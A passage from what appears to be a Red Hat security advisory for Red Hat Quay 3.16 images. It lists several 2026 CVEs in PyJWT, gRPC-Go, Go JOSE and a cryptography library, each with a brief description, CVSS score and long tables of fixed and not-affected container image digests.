Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Moderate

CVE-2026-32597

A missing verification step has been discovered in PyJWT. PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-33186

A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-551 - Incorrect Behavior Order: Authorization Before Parsing and Canonicalization

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-33894

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-34986

A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-39892

A flaw was found in the cryptography library. This vulnerability occurs when a non-contiguous buffer is passed to certain application programming interfaces (APIs) that accept Python buffers, such as Hash.update(). A remote attacker could exploit this to cause a buffer overflow, potentially leading to a denial of service.

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
